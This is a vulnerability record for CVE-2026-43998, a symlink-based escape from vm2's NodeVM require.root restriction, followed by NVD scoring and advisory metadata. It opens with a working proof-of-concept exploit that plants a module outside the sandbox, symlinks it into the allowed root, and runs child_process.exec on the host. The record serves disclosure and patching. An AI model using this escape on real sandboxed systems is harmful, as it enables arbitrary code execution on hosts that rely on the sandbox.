CVE-2026-43998

const { NodeVM } = require('vm2'); const fs = require('fs'); const path = require('path'); // 1. Setup a restricted environment const vm = new NodeVM({ require: { root: "./trusted_folder", external: false } }); // 2. Simulate a file outside the root that we want to load fs.writeFileSync('/tmp/evil_module.js', 'module.exports = () => { console.log("RCE!"); require("child_process").exec("calc"); }'); // 3. Malicious code running inside the sandbox const maliciousCode = ` const fs = require('fs'); // Create a symlink inside the allowed root pointing to the external file // path.resolve checks the symlink path (valid), require resolves the target (invalid) fs.symlinkSync('/tmp/evil_module.js', './trusted_folder/link_to_evil.js'); // Require the symlink. vm2 validates './trusted_folder/link_to_evil.js' (OK) // Node.js require loads '/tmp/evil_module.js' (Bypass!) const evil = require('./trusted_folder/link_to_evil.js'); evil(); `; vm.run(maliciousCode);

{"cve": {"id": "CVE-2026-43998", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:16.317", "lastModified": "2026-05-14T15:36:55.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vm2 is an open source vm/sandbox for Node.js. In 3.10.5, NodeVM's require.root path restriction can be bypassed using filesystem symlinks, allowing sandboxed code to load modules from outside the allowed root directory in host context. Because path validation uses path.resolve() (which does not dereference symlinks) but module loading uses Node's native require() (which does), an attacker can load arbitrary host-realm modules and achieve remote code execution. This vulnerability is fixed in 3.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vm2_project:vm2:3.10.5:*:*:*:*:node.js:*:*", "matchCriteriaId": "C6CF5783-8EBF-4BF6-B816-055195F260E3"}]}]}], "references": [{"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-cp6g-6699-wx9c", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-cp6g-6699-wx9c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}